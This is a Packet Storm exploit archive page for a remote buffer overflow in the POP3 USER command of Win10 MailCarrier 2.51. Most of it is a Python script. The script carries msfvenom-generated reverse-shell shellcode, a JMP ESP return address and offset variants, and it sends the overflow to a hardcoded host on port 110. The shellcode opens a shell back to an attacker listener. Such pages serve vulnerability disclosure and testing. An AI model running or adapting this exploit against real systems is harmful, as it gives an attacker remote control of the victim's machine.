what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Win10 MailCarrier 2.51 Buffer Overflow

Win10 MailCarrier 2.51 Buffer Overflow
Posted Oct 29, 2019
Authored by Dino Covotsos, Lance Biggerstaff

Win10 MailCarrier version 2.51 POP3 User remote buffer overflow exploit.

tags | exploit, remote, overflow
SHA-256 | 13098e760a816ccb94607e0bf00c0b7ce7100d3be40e32babf503a1307f8b8a4

Win10 MailCarrier 2.51 Buffer Overflow

Change Mirror Download
# Exploit Title: Win10 MailCarrier 2.51 - 'POP3 User' Remote Buffer Overflow
# Date: 2019-10-01
# Author: Lance Biggerstaff
# Original Exploit Author: Dino Covotsos - Telspace Systems
# Vendor Homepage: https://www.tabslab.com/
# Version: 2.51
# Tested on: Windows 10
# Note: Every version of Windows 10 has a different offset ¯\_(ツ)_/¯

#!/usr/bin/python

import sys
import socket
import time

#msfvenom -p windows/shell/reverse_tcp lhost=IP_ADDRESS lport=LISYTENING_PORT -b '\x00\xd9' -f python

buf = ""
buf += "\x2b\xc9\x83\xe9\xaa\xe8\xff\xff\xff\xff\xc0\x5e\x81"
buf += "\x76\x0e\xe7\xb4\xfe\x5c\x83\xee\xfc\xe2\xf4\x1b\x5c"
buf += "\x7c\x5c\xe7\xb4\x9e\xd5\x02\x85\x3e\x38\x6c\xe4\xce"
buf += "\xd7\xb5\xb8\x75\x0e\xf3\x3f\x8c\x74\xe8\x03\xb4\x7a"
buf += "\xd6\x4b\x52\x60\x86\xc8\xfc\x70\xc7\x75\x31\x51\xe6"
buf += "\x73\x1c\xae\xb5\xe3\x75\x0e\xf7\x3f\xb4\x60\x6c\xf8"
buf += "\xef\x24\x04\xfc\xff\x8d\xb6\x3f\xa7\x7c\xe6\x67\x75"
buf += "\x15\xff\x57\xc4\x15\x6c\x80\x75\x5d\x31\x85\x01\xf0"
buf += "\x26\x7b\xf3\x5d\x20\x8c\x1e\x29\x11\xb7\x83\xa4\xdc"
buf += "\xc9\xda\x29\x03\xec\x75\x04\xc3\xb5\x2d\x3a\x6c\xb8"
buf += "\xb5\xd7\xbf\xa8\xff\x8f\x6c\xb0\x75\x5d\x37\x3d\xba"
buf += "\x78\xc3\xef\xa5\x3d\xbe\xee\xaf\xa3\x07\xeb\xa1\x06"
buf += "\x6c\xa6\x15\xd1\xba\xdc\xcd\x6e\xe7\xb4\x96\x2b\x94"
buf += "\x86\xa1\x08\x8f\xf8\x89\x7a\xe0\x3d\x16\xa3\x37\x0c"
buf += "\x6e\x5d\xe7\xb4\xd7\x98\xb3\xe4\x96\x75\x67\xdf\xfe"
buf += "\xa3\x32\xde\xf4\x34\x27\x1c\xec\x59\x8f\xb6\xfe\x5c"
buf += "\xf2\x3d\x18\x0c\xb7\xe4\xae\x1c\xb7\xf4\xae\x34\x0d"
buf += "\xbb\x21\xbc\x18\x61\x69\x36\xf7\xe2\xa9\x34\x7e\x11"
buf += "\x8a\x3d\x18\x61\x7b\x9c\x93\xbe\x01\x12\xef\xc1\x12"
buf += "\xb4\x80\xb4\xfe\x5c\x8d\xb4\x94\x58\xb1\xe3\x96\x5e"
buf += "\x3e\x7c\xa1\xa3\x32\x37\x06\x5c\x99\x82\x75\x6a\x8d"
buf += "\xf4\x96\x5c\xf7\xb4\xfe\x0a\x8d\xb4\x96\x04\x43\xe7"
buf += "\x1b\xa3\x32\x27\xad\x36\xe7\xe2\xad\x0b\x8f\xb6\x27"
buf += "\x94\xb8\x4b\x2b\xdf\x1f\xb4\x83\x74\xbf\xdc\xfe\x1c"
buf += "\xe7\xb4\x94\x5c\xb7\xdc\xf5\x73\xe8\x84\x01\x89\xb0"
buf += "\xdc\x8b\x32\xaa\xd5\x01\x89\xb9\xea\x01\x50\xc3\xbb"
buf += "\x7b\x2c\x18\x4b\x01\xb5\x7c\x4b\x01\xa3\xe6\x77\xd7"
buf += "\x9a\x92\x75\x3d\xe7\x17\x01\x5c\x0a\x8d\xb4\xad\xa3"
buf += "\x32\xb4\xfe\x5c"

jmpesp = '\x23\x49\xA1\x0F'

#buffer = '\x41' * 5093 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
#buffer = '\x41' * 5093 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
buffer = '\x41' * 5095 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
#buffer = '\x41' * 5097 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
#buffer = '\x41' * 5099 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)

print "[*] MailCarrier 2.51 POP3 Buffer Overflow in USER command\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(("192.168.121.87", 110))
print s.recv(1024)
s.send('USER ' + buffer + '\r\n')
print s.recv(1024)
s.send('QUIT\r\n')
s.close()
time.sleep(1)
print "[*] Done, but if you get here the exploit failed!"
Login or Register to add favorites

File Archive:

February 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    11 Files
  • 2
    Feb 2nd
    9 Files
  • 3
    Feb 3rd
    5 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    0 Files
  • 6
    Feb 6th
    9 Files
  • 7
    Feb 7th
    0 Files
  • 8
    Feb 8th
    0 Files
  • 9
    Feb 9th
    0 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    0 Files
  • 13
    Feb 13th
    0 Files
  • 14
    Feb 14th
    0 Files
  • 15
    Feb 15th
    0 Files
  • 16
    Feb 16th
    0 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close